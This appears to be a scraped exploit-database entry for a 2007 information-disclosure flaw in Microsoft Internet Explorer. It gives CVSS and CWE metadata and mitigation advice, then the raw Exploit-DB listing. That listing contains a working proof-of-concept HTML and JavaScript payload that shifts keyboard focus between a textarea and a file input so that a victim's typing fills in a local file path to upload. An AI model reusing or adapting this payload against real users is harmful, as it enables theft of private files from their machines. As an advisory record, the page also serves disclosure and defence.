Information Disclosure Vulnerability in Microsoft Internet Explorer

vendor:

Internet Explorer

by:

Unknown

5.5

CVSS

MEDIUM

Information Disclosure

200

CWE

Product Name: Internet Explorer

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:microsoft:internet_explorer

Metasploit:

Other Scripts:

Platforms Tested: Windows

2007

Information Disclosure Vulnerability in Microsoft Internet Explorer

The vulnerability allows attackers to gain access to the contents of arbitrary files by exploiting a design error in the handling of form fields in Microsoft Internet Explorer. An attacker can use a specially crafted script to manipulate the behavior of the file input field and access the contents of files on the victim's system.

Mitigation:

Apply the latest security patches and updates from Microsoft. Avoid visiting untrusted websites and downloading files from untrusted sources. Use alternative web browsers until the vulnerability is patched.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25836/info

Microsoft Internet Explorer is prone to an information-disclosure vulnerability that allows attackers to gain access to the contents of arbitrary files.

This issue stems from a design error resulting from the improper handling of form fields.

This issue is similar to the one described in BID 24725 (Mozilla Firefox OnKeyDown Event File Upload Vulnerability). 

# based upon Hong's exploit:
# http://sla.ckers.org/forum/read.php?3,13142

<script>

function Clear() {
     document.getElementById("label1").htmlFor="file1";
     document.getElementById("text1").focus();
}

function Down() {
     document.getElementById("file1").focus();
}

</script>

<input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<label id="label1" name="label1"></label>
<br />
<textarea name="text1" id="text1" onkeydown="Down()">
&lt;/textarea&gt;